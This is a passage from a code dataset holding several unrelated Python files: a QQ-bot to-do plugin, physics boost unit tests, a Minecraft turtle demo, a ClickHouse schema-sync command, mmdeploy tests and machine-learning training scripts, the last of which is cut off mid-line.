proxy.lower():\n raise ValueError('only support http proxy')\n proxy = proxy.split('://')\n proxy = proxy[1] if len(proxy) == 2 else proxy[0]\n return proxy\n\n def update(self):\n config = ConfigParser()\n config.read(self.path, encoding='utf-8-sig')\n self.raw = config\n self.fullscreen = self.raw.getboolean('emby', 'fullscreen', fallback=True)\n self.debug_mode = self.raw.getboolean('dev', 'debug', fallback=False)\n self.disable_audio = self.raw.getboolean('dev', 'disable_audio', fallback=False) # test in vm\n self.gui_is_enable = self.raw.getboolean('gui', 'enable', fallback=False)\n self.sys_proxy = self._get_sys_proxy()\n self.dl_proxy = self._get_proxy('download')\n self.script_proxy = self._get_proxy('script')\n self.player_proxy = self._get_proxy('player')\n return config\n\n def check_str_match(self, _str, section, option, return_value=False, log=True):\n ini_list = self.ini_str_split(section, option, fallback='')\n match_list = [i for i in ini_list if i in _str]\n if ini_list and any(match_list):\n result = match_list[0] if return_value else True\n else:\n result = False\n _log = {True: \"match\", False: \"not match\"}[bool(result)]\n if log:\n _log = f'{_str} {_log}: {section}[{option}] {ini_list}'\n if MyLogger.need_mix:\n _log = MyLogger.mix_args_str(_log)\n MyLogger.log(_log)\n return result\n\n\nconfigs = Configs()\n","repo_name":"kjtsune/embyToLocalPlayer","sub_path":"utils/configs.py","file_name":"configs.py","file_ext":"py","file_size_in_byte":7496,"program_lang":"python","lang":"en","doc_type":"code","stars":234,"dataset":"github-code","pt":"53"} +{"seq_id":"39401068849","text":"import json, os\r\nfrom functools import cmp_to_key\r\nfrom PIL import Image, ImageDraw, ImageFont\r\nfrom plugins.identify import id_func, SU\r\nimport time\r\n\r\nlong_term = [] # {name=\"\", done=T/F}\r\nshort_term = [] # {name=\"\", parts=ini, part_name=\"\", to_part=\"\", time=\"\"}\r\ndir_path = os.getcwd() + '/data/todo/'\r\n\r\ndef init():\r\n global long_term, short_term\r\n if not os.path.exists(dir_path):\r\n os.makedirs(dir_path)\r\n \r\n try:\r\n with open(dir_path + 'long_term.json', 'r', encoding = 'utf-8') as f:\r\n long_term = json.load(f)\r\n except FileNotFoundError:\r\n with open(dir_path + 'long_term.json', 'w', encoding = 'utf-8') as f:\r\n json.dump(long_term, f)\r\n\r\n try:\r\n with open(dir_path + 'short_term.json', 'r', encoding = 'utf-8') as f:\r\n short_term = json.load(f)\r\n except FileNotFoundError:\r\n with open(dir_path + 'short_term.json', 'w', encoding = 'utf-8') as f:\r\n json.dump(short_term, f)\r\n\r\n print('[+] todo组件初始化成功')\r\n\r\ninit()\r\n\r\ndef write_json():\r\n with open(dir_path + 'long_term.json', 'w', encoding = 'utf-8') as f:\r\n json.dump(long_term, f)\r\n with open(dir_path + 'short_term.json', 'w', encoding = 'utf-8') as f:\r\n json.dump(short_term, f)\r\n \r\ndef short_cmp(t1, t2):\r\n if t1['done'] != t2['done']:\r\n if t1['done'] == True:\r\n return 1\r\n else:\r\n return -1\r\n return len(t1['name']) - len(t2['name'])\r\n\r\ndef long_cmp(t1, t2):\r\n return -t1['to_part']/t1['parts'] + t2['to_part']/t2['parts']\r\n\r\ndef once_modify():\r\n short_term.sort(key = cmp_to_key(short_cmp))\r\n long_term.sort(key = cmp_to_key(long_cmp))\r\n write_json()\r\n if os.path.exists(dir_path + 'todo.png'):\r\n os.remove(dir_path + 'todo.png')\r\n\r\ndef get_font(id, size):\r\n FONTS_PATH = 'src/fonts'\r\n if id == 'wh':\r\n return ImageFont.truetype(os.path.join(FONTS_PATH, '汉仪文黑.ttf'), size)\r\n if id == 'num':\r\n return ImageFont.truetype(os.path.join(FONTS_PATH, 'JetBrainsMono-ExtraBold-6.ttf'), size)\r\n\r\nwhite = (0xff, 0xff, 0xff, 0xff)\r\nblack = (0x00, 0x00, 0x00, 0xff)\r\ngray = (0xe0, 0xe0, 0xe0, 0xff)\r\ndark_blue = (0x0f, 0x1f, 0x3f, 0xff)\r\n\r\ndef draw_short(id, T):\r\n width = 800\r\n height = 100\r\n\r\n # 先画左边那个小框框\r\n check = Image.open(os.getcwd() + '/src/check.png')\r\n check = check.resize((75, 70))\r\n check_box = Image.new('RGBA', (75, 70), (0xdf, 0xdf, 0xdf, 0xff))\r\n draw_check = ImageDraw.Draw(check_box)\r\n # draw.rectangle((15, 15, 90, 85), fill=(0xbf, 0xbf, 0xbf, 0xff))\r\n draw_check.text((5, 2), str(id).zfill(2), fill=dark_blue, font=get_font('num', 55))\r\n check = Image.blend(check, Image.new(\"RGBA\", (75, 70), (0, 0, 0, 0)), 0.2)\r\n if T['done']:\r\n check_box.paste(check, (0, 0), mask=check)\r\n\r\n # 再画大框框和字\r\n img = Image.new('RGBA', (width, height), white)\r\n draw = ImageDraw.Draw(img)\r\n draw.text((120, 16), str(T['name']), fill=black, font=get_font('wh', 60))\r\n img.paste(check_box, (15, 15))\r\n # img.save(img_path)\r\n return img\r\n\r\n\r\ndef draw_long(id, T):\r\n width = 800\r\n height = 160\r\n img = Image.new('RGBA', (width, height), white)\r\n draw = ImageDraw.Draw(img)\r\n\r\n # id的小框\r\n x0, y0 = 20, 90\r\n w0, h0 = 140, 50\r\n id = \"{0:#0{1}x}\".format(id,4)\r\n draw.rectangle((x0, y0, x0 + w0, y0 + h0), fill = gray)\r\n draw.text((x0 + 10, y0), id, fill = dark_blue, font = get_font('wh', 45))\r\n\r\n # name\r\n x1, y1 = 20, 20\r\n w1, h1 = 600, 60\r\n draw.rectangle((x1, y1, x1 + w1, y1 + h1), fill = gray)\r\n text = T['name']\r\n draw.text((x1 + 10, y1 + 8), text, fill = black, font=get_font('wh', 40))\r\n\r\n # part name\r\n x2, y2 = 170, 90\r\n w2, h2 = x1 + w1 - x2, 50\r\n draw.rectangle((x2, y2, x2 + w2, y2 + h2), fill = (0xef, 0xef, 0xef, 0xff))\r\n draw.text((x2 + 10, y2 + 5), '事项进度:' + T['part_name'], fill = black, font=get_font('wh', 20))\r\n # time\r\n x3, y3 = x2, y2 + 20\r\n draw.text((x3 + 10, y3 + 5), '上次更新:' + T['time'], fill = black, font=get_font('wh', 20))\r\n\r\n # 圈圈\r\n x4, y4 = 720, 80\r\n r4 = 70\r\n draw.ellipse((x4 - r4, y4 - r4, x4 + r4, y4 + r4), fill = None, outline = (0xa0, 0xa0, 0xa0, 0xff), width = 35)\r\n start = -90\r\n end = -90 + 360 * T['to_part'] / T['parts']\r\n draw.arc((x4 - r4, y4 - r4, x4 + r4, y4 + r4), fill = (0x00, 0xff, 0x00, 0xff), start = start, end = end, width = 35)\r\n \r\n\r\n # 进度字样\r\n x4, y4 = x2 + 330, y3 + 5\r\n draw.text((x4, y4), '进度:' + str(T['to_part']).zfill(2) + '/' + str(T['parts']).zfill(2), fill = black, font = get_font('wh', 20))\r\n return img\r\n\r\ndef draw_todo():\r\n img_path = dir_path + '/todo.png'\r\n\r\n if os.path.exists(img_path):\r\n return img_path\r\n\r\n height = 104 * len(short_term) + 164 * len(long_term) + 280\r\n width = 960\r\n img = Image.new('RGBA', (width, height), gray)\r\n draw = ImageDraw.Draw(img)\r\n draw.text((300, 20), '短期事项', fill = dark_blue, font = get_font('wh', 80))\r\n px = 80\r\n py = 120\r\n idx = 0\r\n for i in short_term:\r\n img.paste(draw_short(idx, i), (px, py))\r\n idx = idx + 1\r\n py = py + 102\r\n\r\n py = py + 30\r\n draw.text((300, py), '长期事项', fill = dark_blue, font = get_font('wh', 80))\r\n py = py + 100\r\n idx = 0\r\n for i in long_term:\r\n img.paste(draw_long(idx, i), (px, py))\r\n idx = idx + 1\r\n py = py + 164\r\n img.save(img_path)\r\n return img_path\r\n\r\nasync def show_todo(event, bot):\r\n print('[+] 触发show_todo')\r\n await bot.send(event, f'[CQ:image,file=files:///{draw_todo()}]')\r\n\r\ndef get_time_str():\r\n return time.strftime(\"%Y/%m/%d %H:%M\", time.localtime())\r\n\r\nasync def add_todo(T, event, bot):\r\n print('[+] 触发add_todo')\r\n T = T.replace(\"'\", '\"')\r\n try:\r\n T = json.loads(T)\r\n except json.decoder.JSONDecodeError:\r\n await bot.send(event, '格式错了,改一改再试试呢')\r\n return\r\n \r\n if not 'type' in T:\r\n await bot.send(event, '缺少事件类型,改一下再试试呢')\r\n return\r\n if not 'name' in T:\r\n await bot.send(event, '缺少事件名,改一下再试试呢')\r\n return\r\n \r\n if T['type'] == 'short':\r\n short_term.append({'name': T['name'], 'done': False})\r\n once_modify()\r\n await bot.send(event, '添加成功')\r\n await show_todo(event, bot)\r\n return\r\n elif T['type'] == 'long':\r\n if not 'parts' in T or type(T['parts']) != int:\r\n await bot.send(event, '总进度参数错误')\r\n return\r\n if 'part' in T and type(T['part']) == int and 'pname' in T:\r\n to_part = T['part']\r\n part_name = T['pname']\r\n else:\r\n to_part = 0\r\n part_name = 'None'\r\n time_str = get_time_str()\r\n long_term.append({\r\n 'name': T['name'],\r\n 'parts': T['parts'],\r\n 'to_part': to_part,\r\n 'part_name': part_name,\r\n 'time': time_str\r\n })\r\n once_modify()\r\n await bot.send(event, '添加成功')\r\n await show_todo(event, bot)\r\n return\r\n else:\r\n await bot.send(event, 'type参数错误')\r\n return\r\n\r\nasync def done_todo(T, event, bot):\r\n print('[+] 触发done_todo')\r\n if T.isdigit():\r\n T = int(T)\r\n if T < len(short_term):\r\n short_term[T]['done'] = True\r\n once_modify()\r\n await bot.send(event, '记下了!')\r\n return\r\n else:\r\n await bot.send(event, 'IndexError!!!你个傻逼!')\r\n return\r\n else:\r\n T = T.replace(\"'\", '\"')\r\n try:\r\n T = json.loads(T)\r\n except json.decoder.JSONDecodeError:\r\n await bot.send(event, '格式错了,改一改再试试呢')\r\n return\r\n if 'id' in T and 'part' in T and 'pname' in T:\r\n time_str = get_time_str()\r\n id = int(T['id'], base = 16)\r\n if id < len(long_term):\r\n long_term[id]['time'] = time_str\r\n long_term[id]['to_part'] = T['part']\r\n long_term[id]['part_name'] = T['pname']\r\n once_modify()\r\n await bot.send(event, '记下了')\r\n return\r\n else:\r\n await bot.send(event, 'IndexError!!!你个傻逼!')\r\n return\r\n else:\r\n await bot.send(event, '缺参数了!')\r\n return\r\n\r\n\r\n \r\nasync def del_todo(id, event, bot):\r\n print('[+] 触发del_todo')\r\n if id[:2] == '0x':\r\n try:\r\n id = int(id, base=16)\r\n except ValueError:\r\n await bot.send(event, 'ValueError!!!你个傻逼!')\r\n return\r\n else:\r\n if id < len(long_term):\r\n long_term.pop(id)\r\n once_modify()\r\n await bot.send(event, '删除成功了喔')\r\n return\r\n else:\r\n await bot.send(event, 'IndexError!!!你个傻逼!')\r\n return\r\n else:\r\n try:\r\n id = int(id)\r\n except ValueError:\r\n await bot.send(event, 'ValueError!!!你个傻逼!')\r\n return\r\n else:\r\n if id < len(short_term):\r\n short_term.pop(id)\r\n once_modify()\r\n await bot.send(event, '删除成功了喵')\r\n return\r\n else:\r\n await bot.send(event, 'IndexError!!!你个傻逼!')\r\n return\r\n\r\nhelp_msg = '感兴趣的可以看看\\nhttps://github.com/PrssHH/ttBot#todo%E6%8F%92%E4%BB%B6'\r\n\r\nasync def todo(event, bot):\r\n msg = str(event.message)\r\n if msg[:5] != '-todo':\r\n return False\r\n\r\n if not id_func(event, 'todo'):\r\n return True\r\n \r\n if msg == '-todo':\r\n await show_todo(event, bot)\r\n return True\r\n \r\n if not event.user_id in SU:\r\n await bot.send(event, 'QAQ 只有华华可以改自己的todolist...')\r\n return True\r\n \r\n msg = msg[6:]\r\n if msg[:3] == 'add':\r\n await add_todo(msg[4:], event, bot)\r\n elif msg[:4] == 'done':\r\n await done_todo(msg[5:], event, bot)\r\n elif msg[:3] == 'del':\r\n await del_todo(msg[4:], event, bot)\r\n elif msg == 'help':\r\n print('[+] 触发todo_help')\r\n await bot.send(event, help_msg)\r\n else:\r\n await bot.send(event, '指令错了喵')\r\n return True\r\n","repo_name":"ush11o/ttBot","sub_path":"plugins/todo.py","file_name":"todo.py","file_ext":"py","file_size_in_byte":10600,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"29524685429","text":"import numpy as np\nimport utils\nimport boosts\nimport pytest\n\nD_MASS_GEV = 1.86484\nK_MASS_GEV = 0.493677\nPI_MASS_GEV = 0.139570\n\n\ndef test_array_to_array():\n N = 10\n\n # oOoOo random numbers in a unit test OoOooo\n target = np.random.random((4, N))\n\n assert np.allclose(target, boosts._to_arrays(target, N))\n\n\ndef test_particle_to_array():\n N = 3\n\n target = [1, 2, 3, 4]\n expected = np.array([[1, 1, 1], [2, 2, 2], [3, 3, 3], [4, 4, 4]])\n\n assert np.allclose(expected, boosts._to_arrays(target, N))\n\n target = np.array([1, 2, 3, 4])\n assert np.allclose(expected, boosts._to_arrays(target, N))\n\n\ndef test_to_array_bad_shape():\n N = 3\n with pytest.raises(ValueError):\n boosts._to_arrays([1, 2, 3], N)\n\n with pytest.raises(ValueError):\n boosts._to_arrays([1, 2, 3, 4, 5], N)\n\n with pytest.raises(ValueError):\n boosts._to_arrays(np.random.random((3, N)), N)\n\n with pytest.raises(ValueError):\n boosts._to_arrays(np.random.random((5, N)), N)\n\n\ndef test_beta():\n assert utils._velocity(5.0 / 3.0) == 0.8\n\n\ndef test_magnitude():\n assert utils._magnitude(np.array([2.0, 7.0, 26.0])) == 27.0\n\n\ndef test_direction():\n assert np.allclose(\n utils.direction(np.array([2.0, 7.0, 26.0])),\n np.array([2.0 / 27.0, 7.0 / 27.0, 26.0 / 27.0]),\n )\n\n\ndef test_mass():\n assert utils._masses(27.0, 2.0, 7.0, 26.0) == 0.0\n\n\ndef test_masses():\n energies = np.array([27.0, 28.0, 10.0, 15.0])\n px = np.array([2.0, 2.0, 1.0, 2.0])\n py = np.array([7.0, 7.0, -2.0, 0.0])\n pz = np.array([26.0, 26.0, 3.0, 4.0])\n\n assert np.allclose(\n utils._masses(energies, px, py, pz),\n np.array([0.0, np.sqrt(55), np.sqrt(86), np.sqrt(205)]),\n )\n\n\ndef test_multiply():\n assert np.allclose(\n utils._multiply(np.array([1, 2]), np.array([[1, 2, 3], [4, 5, 6]])),\n np.array([[1, 2, 3], [8, 10, 12]]),\n )\n\n\ndef test_no_boost():\n # Stationary D\n d_momentum = np.array([0.0, 0.0, 0.0, D_MASS_GEV])\n\n gamma = utils.gamma(D_MASS_GEV, d_momentum[3])\n dirn = d_momentum[:3]\n\n # vector to boost\n target = np.array([1, 2, 3, 4])\n\n # Check that it's unaffected\n assert np.all(utils.boost(target, gamma, dirn) == target)\n\n\ndef test_x_boost():\n \"\"\"\n Boost along the x axis\n\n \"\"\"\n d_3momentum = [5.0, 0.0, 0.0]\n d_energy = np.sqrt(np.linalg.norm(d_3momentum) ** 2 + D_MASS_GEV ** 2)\n d_4momentum = np.array([*d_3momentum, d_energy])\n\n k_3momentum = [0.0, 3.0, -4.0]\n k_energy = np.sqrt(np.linalg.norm(k_3momentum) ** 2 + K_MASS_GEV ** 2)\n k_4momentum = np.array([*k_3momentum, k_energy])\n\n gamma = utils.gamma(D_MASS_GEV, d_energy)\n dirn = np.array([1.0, 0.0, 0.0])\n\n expected = np.array([-13.47280853, 3.0, -4.0, 14.37916154])\n\n assert np.allclose(expected, utils.boost(k_4momentum, gamma, dirn), atol=0.01)\n\n\ndef test_general_boost():\n \"\"\"\n Boost along a not-nice direction\n\n \"\"\"\n d_3momentum = np.array([1.0, 2.0, 3.0])\n d_energy = np.sqrt(np.linalg.norm(d_3momentum) ** 2 + D_MASS_GEV ** 2)\n d_4momentum = np.array([*d_3momentum, d_energy])\n\n k_3momentum = [1.0, 3.0, -4.0]\n k_energy = np.sqrt(np.linalg.norm(k_3momentum) ** 2 + K_MASS_GEV ** 2)\n k_4momentum = np.array([*k_3momentum, k_energy])\n\n gamma = utils.gamma(D_MASS_GEV, d_energy)\n dirn = utils.direction(d_3momentum)\n\n expected = np.array([-2.190947286, -3.381894571, -13.57284186, 14.16697618])\n\n assert np.allclose(expected, utils.boost(k_4momentum, gamma, dirn), atol=0.01)\n","repo_name":"richard-lane/lorentz-boost","sub_path":"lorentz-boost/test/test_ut.py","file_name":"test_ut.py","file_ext":"py","file_size_in_byte":3530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21814637084","text":"from mcpi.minecraft import Minecraft #Importing MCPI, which is necessary for MCpen\nimport time #Yet another import (not that important)\nfrom MCpen.mcturtle import MCTurtle, direction #Imports imports imports. (This one is important because it actually import the MCpen library)\n#Please note: when you do [pip install MCpen], you do not need to include the MCpen before the [mcturtle]. This is for the convience for those who cannot use the pip install method.\nimport random\n#More unnecesasry imports\n\nmc = Minecraft.create(\"localhost\") #This initializes the connection to a server, in this case it is 'local host', meaning that the server is local on your computer.\nplayerId = mc.getPlayerEntityId(\"GnarlyLlama\") #This gets the Player ID, which contains all sorts of stuff ranging from the player's position and stuff like that.\n# Note: if you wish to use your own player ID, please replace the current user name with your user name.\npos = mc.entity.getPos(playerId) # We get the position of the player we appointed to earlier.\npx = pos.x # Get the X coordinate of the player's position\npy = pos.y # Get the Y coordinate of the player's position\npz = pos.z # Get the Z coordinate of the player's position\nt = MCTurtle(mc, px, py-1, pz) # This actually initialize and create the turtle, in this case under the player's feet.\ntime.sleep(3) # Time sleep 3 second so we can have time to switch over and see what is going on\n\n# SET UP STUFF\n#---------------------------------------------\n# ACTUAL STUFF\n\nt.updateStroke(159) # We update the stroke to 159, which is white_hardened_clay. This makes the pen draw that block when it is moved around.\nt.forward(15) # We move the pen forward 15 blocks\ntime.sleep(1) # We wait 1 second\nt.turn(direction.UP) # Turn the pen UP\ntime.sleep(1) # Wait another second\nt.forward(10) # Move the pen forward 10 blocks (In this case it moves up because the pen it pointing upwards. Think of your self as the pen. When you turn up, going forward means going in that direction)\ntime.sleep(1)\nt.turn(direction.DOWN) # We turn the pen back down\ntime.sleep(1)\nt.home() # And finally, we go to the original place where the turtle came from.\n","repo_name":"LemonFoxmere/MCturtle","sub_path":"demos/demo1.py","file_name":"demo1.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39511296979","text":"import logging\nimport re\nfrom collections import defaultdict\nfrom typing import Dict, Set\n\nimport structlog\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand\n\nfrom posthog.clickhouse.schema import CREATE_TABLE_QUERIES, get_table_name\nfrom posthog.client import sync_execute\nfrom posthog.cloud_utils import is_cloud\n\nlogger = structlog.get_logger(__name__)\nlogger.setLevel(logging.INFO)\n\nTableName = str\nQuery = str\nHostName = str\n\n\nclass Command(BaseCommand):\n help = \"Synchronize schema across clickhouse cluster, creating missing tables on new nodes\"\n\n def add_arguments(self, parser):\n parser.add_argument(\n \"--dry-run\",\n action=\"store_true\",\n help=\"Exits with a non-zero status if schema changes would be required.\",\n )\n\n def handle(self, *args, **options):\n if is_cloud():\n logger.info(\"✅ Skipping sync_replicated_schema because is_cloud=true\")\n return\n\n _, create_table_queries, out_of_sync_hosts = self.analyze_cluster_tables()\n\n if len(out_of_sync_hosts) > 0:\n logger.info(\n \"Schema out of sync on some clickhouse nodes!\",\n out_of_sync_hosts=out_of_sync_hosts,\n )\n\n if options.get(\"dry_run\"):\n exit(1)\n else:\n self.create_missing_tables(out_of_sync_hosts, create_table_queries)\n\n logger.info(\"✅ All ClickHouse nodes schema in sync\")\n\n def analyze_cluster_tables(self):\n table_names = list(map(get_table_name, CREATE_TABLE_QUERIES))\n rows = sync_execute(\n \"\"\"\n SELECT hostName() as host, name, create_table_query\n FROM clusterAllReplicas(%(cluster)s, system, tables)\n WHERE database = %(database)s\n AND name IN %(table_names)s\n \"\"\",\n {\n \"cluster\": settings.CLICKHOUSE_CLUSTER,\n \"database\": settings.CLICKHOUSE_DATABASE,\n \"table_names\": table_names,\n },\n )\n\n host_tables: Dict[HostName, Set[TableName]] = defaultdict(set)\n create_table_queries: Dict[TableName, Query] = {}\n\n for host, table_name, create_table_query in rows:\n host_tables[host].add(table_name)\n create_table_queries[table_name] = create_table_query\n\n return host_tables, create_table_queries, self.get_out_of_sync_hosts(host_tables)\n\n def get_out_of_sync_hosts(self, host_tables: Dict[HostName, Set[TableName]]) -> Dict[HostName, Set[TableName]]:\n table_names = list(map(get_table_name, CREATE_TABLE_QUERIES))\n out_of_sync = {}\n\n for host, tables in host_tables.items():\n missing_tables = set(table_names) - tables\n if len(missing_tables) > 0:\n out_of_sync[host] = missing_tables\n\n return out_of_sync\n\n def create_missing_tables(\n self,\n out_of_sync_hosts: Dict[HostName, Set[TableName]],\n create_table_queries: Dict[TableName, Query],\n ):\n missing_tables = set(table for tables in out_of_sync_hosts.values() for table in tables)\n\n logger.info(\"Creating missing tables\", missing_tables=missing_tables)\n for table in missing_tables:\n query = create_table_queries[table]\n sync_execute(self.run_on_cluster(query))\n\n def run_on_cluster(self, create_table_query: Query) -> Query:\n return re.sub(\n r\"^CREATE TABLE (\\S+)\",\n f\"CREATE TABLE IF NOT EXISTS \\\\1 ON CLUSTER '{settings.CLICKHOUSE_CLUSTER}'\",\n create_table_query,\n count=1,\n )\n","repo_name":"PostHog/posthog","sub_path":"posthog/management/commands/sync_replicated_schema.py","file_name":"sync_replicated_schema.py","file_ext":"py","file_size_in_byte":3654,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"13921109091","text":"import os\nfrom tempfile import NamedTemporaryFile, TemporaryDirectory\n\nimport numpy as np\nimport pytest\nimport torch\nfrom mmengine import Config\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data.dataset import Dataset\n\nimport mmdeploy.apis.onnxruntime as ort_apis\nfrom mmdeploy.apis import build_task_processor\nfrom mmdeploy.codebase import import_codebase\nfrom mmdeploy.core.rewriters.rewriter_manager import RewriterContext\nfrom mmdeploy.utils import Codebase, load_config\nfrom mmdeploy.utils.test import DummyModel, SwitchBackendWrapper, WrapFunction\n\ntry:\n import_codebase(Codebase.MMAGIC)\nexcept ImportError:\n pytest.skip(\n f'{Codebase.MMAGIC} is not installed.', allow_module_level=True)\n\nmodel_cfg = 'tests/test_codebase/test_mmagic/data/model.py'\nmodel_cfg = load_config(model_cfg)[0]\ndeploy_cfg = Config(\n dict(\n backend_config=dict(type='onnxruntime'),\n codebase_config=dict(type='mmagic', task='SuperResolution'),\n onnx_config=dict(\n type='onnx',\n export_params=True,\n keep_initializers_as_inputs=False,\n opset_version=11,\n input_shape=None,\n input_names=['input'],\n output_names=['output'])))\ninput_img = np.random.rand(32, 32, 3)\nimg_shape = [32, 32]\ninput = {'img': input_img}\nonnx_file = NamedTemporaryFile(suffix='.onnx').name\ntask_processor = None\n\n\n@pytest.fixture(autouse=True)\ndef init_task_processor():\n global task_processor\n task_processor = build_task_processor(model_cfg, deploy_cfg, 'cpu')\n\n\n@pytest.fixture\ndef backend_model():\n from mmdeploy.backend.onnxruntime import ORTWrapper\n ort_apis.__dict__.update({'ORTWrapper': ORTWrapper})\n wrapper = SwitchBackendWrapper(ORTWrapper)\n wrapper.set(outputs={\n 'output': torch.rand(1, 3, 50, 50),\n })\n\n yield task_processor.build_backend_model([''])\n\n wrapper.recover()\n\n\ndef test_build_test_runner():\n # Prepare dummy model\n from mmagic.structures import DataSample\n\n img_meta = dict(ori_img_shape=(32, 32, 3))\n img = torch.rand(3, 32, 32)\n data_sample = DataSample(gt_img=img, metainfo=img_meta)\n data_sample.set_data(\n dict(output=DataSample(pred_img=img, metainfo=img_meta)))\n data_sample.set_data(dict(input=img))\n outputs = [data_sample]\n model = DummyModel(outputs=outputs)\n assert model is not None\n # Run test\n with TemporaryDirectory() as dir:\n runner = task_processor.build_test_runner(model, dir)\n wrapped_func = WrapFunction(runner.test)\n\n with RewriterContext({}):\n _ = wrapped_func()\n\n\ndef test_build_pytorch_model():\n from mmagic.models import BaseEditModel\n model = task_processor.build_pytorch_model(None)\n assert isinstance(model, BaseEditModel)\n\n\ndef test_build_backend_model(backend_model):\n assert backend_model is not None\n\n\ndef test_create_input():\n inputs = task_processor.create_input(input_img, input_shape=img_shape)\n assert inputs is not None\n\n\ndef test_visualize(backend_model):\n input_dict, _ = task_processor.create_input(input_img, img_shape)\n\n with torch.no_grad():\n results = backend_model.test_step(input_dict)[0]\n\n with TemporaryDirectory() as dir:\n filename = dir + 'tmp.jpg'\n task_processor.visualize(input_img, results, filename, 'window')\n assert os.path.exists(filename)\n\n\ndef test_get_tensor_from_input():\n assert type(task_processor.get_tensor_from_input(input)) is not dict\n\n\ndef test_get_partition_cfg():\n with pytest.raises(NotImplementedError):\n task_processor.get_partition_cfg(None)\n\n\ndef test_build_dataset_and_dataloader():\n data = dict(\n type='BasicImageDataset',\n ann_file='test_ann.txt',\n metainfo=dict(dataset_type='div2k', task_name='sisr'),\n data_root='tests/test_codebase/test_mmagic/data',\n data_prefix=dict(img='imgs', gt='imgs'),\n pipeline=[\n dict(\n type='LoadImageFromFile',\n key='img',\n color_type='color',\n channel_order='rgb',\n imdecode_backend='cv2'),\n ])\n dataset = task_processor.build_dataset(dataset_cfg=data)\n assert isinstance(dataset, Dataset), 'Failed to build dataset'\n dataloader_cfg = dict(\n num_workers=4,\n persistent_workers=False,\n drop_last=False,\n sampler=dict(type='DefaultSampler', shuffle=False),\n dataset=data)\n dataloader = task_processor.build_dataloader(dataloader_cfg)\n assert isinstance(dataloader, DataLoader), 'Failed to build dataloader'\n","repo_name":"open-mmlab/mmdeploy","sub_path":"tests/test_codebase/test_mmagic/test_super_resolution.py","file_name":"test_super_resolution.py","file_ext":"py","file_size_in_byte":4593,"program_lang":"python","lang":"en","doc_type":"code","stars":2256,"dataset":"github-code","pt":"53"} +{"seq_id":"75297133928","text":"import os, pickle\nimport pandas as pd\nimport datetime\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import roc_curve, roc_auc_score\nfrom sklearn.model_selection import StratifiedKFold\nfrom tqdm import tqdm\n\nimport config\nfrom utils import setup_logger, ModelFactory\n\ndef train(X_train, y_train, model_config, logger):\n model = ModelFactory(config.MODEL_NAME, model_config, logger)\n model.fit(X_train, y_train)\n\n return model\n\ndef valid(model, X_test, y_test):\n pred = model.predict(X_test)[:, 1]\n auc_score = roc_auc_score(y_test, pred)\n return auc_score\n\nif __name__ == '__main__':\n NOW = datetime.datetime.now().strftime('%Y-%m-%d_%H:%M:%S')\n logger = setup_logger('./logs/train_{0}.log'.format(NOW))\n #dataframeとして読み込める方が何かと都合が良い。\n df = pd.read_pickle(os.path.join(config.SAVE_PATH, 'application_train.pickle'))\n logger.info('train_df shape: {0}'.format(df.shape))\n X = df[[col for col in df.columns if col not in config.unused]]\n y = df.TARGET\n\n scores = []\n kfold = StratifiedKFold(n_splits=5, shuffle=True, random_state=42)\n\n logger.info('Start Kfold validation')\n #stratifiedをsplitする際にはその性質上yも指定しなければならない。\n for i, (train_idx, test_idx) in enumerate(tqdm(kfold.split(X, y))):\n model = train(X.iloc[train_idx], y.iloc[train_idx], config.MODEL_CONFIG, logger)\n auc_score = valid(model, X.iloc[test_idx], y.iloc[test_idx])\n scores.append(auc_score)\n logger.info('Iteration number: {}, AUC Score: {}'.format(i, auc_score))\n #X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=config.TEST_SIZE, random_state=config.SEED)\n score_avg = sum(scores)/5\n\n #model = train(X_train, y_train, config.MODEL_CONFIG, logger)\n #auc_score = valid(model, X_test, y_test)\n logger.info('Average AUC Score: {0}'.format(score_avg))\n logger.info('Save Model to directory {0}'.format(config.SAVE_PATH))\n\n pickle.dump(model, open(os.path.join(config.SAVE_PATH, config.MODEL_FILE), 'wb'))","repo_name":"fyk7/home_credit_script","sub_path":"src/train_kfold.py","file_name":"train_kfold.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16070244239","text":"import torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport yaml\nfrom argparse import Namespace\n\nfrom torch_models import LSTM_Transformer\nfrom data_utils.get_data import get_classifier_data\n\ndevice = 'cuda'\n\ndef finetune(yaml_transformer, data_file, save_folder, new_name, \n load_date=None, yaml_pretraining=None):\n X_train, y_train, X_val, y_val, X_test, y_test, n_classes, encoder =\\\n get_classifier_data(data_file)\n \n print(f'Training shape: {X_train.shape}')\n print(f'Validation shape: {X_val.shape}')\n print(f'Test shape: {X_test.shape}') \n\n print(y_train.shape) \n\n transformer_config = yaml_transformer + '.yaml'\n with open(transformer_config, 'r') as stream:\n config = yaml.load(stream, Loader=yaml.FullLoader)\n config = Namespace(**config)\n if not load_date is None:\n \n trajectory_config = save_folder + '/' + yaml_pretraining + load_date + '.yaml'\n with open(trajectory_config, 'r') as stream:\n t_config = yaml.load(stream, Loader=yaml.FullLoader)\n t_config = Namespace(**t_config)\n pred_len = t_config.pred_len\n \n load_model = LSTM_Transformer(pred_type='trajectory',\n out_dim=2*pred_len,\n n_offense=config.n_offense,\n n_defense=config.n_defense,\n hidden_dim=config.hidden_dim,\n num_layers=config.num_layers,\n nhead=config.nhead,\n dropout=config.dropout).to(device)\n load_model_path = save_folder + '/' + t_config.name + load_date + '.pth'\n load_model.load_state_dict(torch.load(load_model_path))\n load_model.to(device)\n \n learning_rate = float(config.learning_rate)\n batch_size = config.batch_size\n patience = config.patience\n num_epochs = config.num_epochs\n model = LSTM_Transformer(pred_type='classify_deepset',\n out_dim=n_classes,\n n_offense=config.n_offense,\n n_defense=config.n_defense,\n hidden_dim=config.hidden_dim,\n num_layers=config.num_layers,\n nhead=config.nhead,\n dropout=config.dropout).to(device) \n \n if not load_date is None:\n params1 = load_model.named_parameters()\n params2 = model.named_parameters()\n \n dict_params2 = dict(params2)\n for 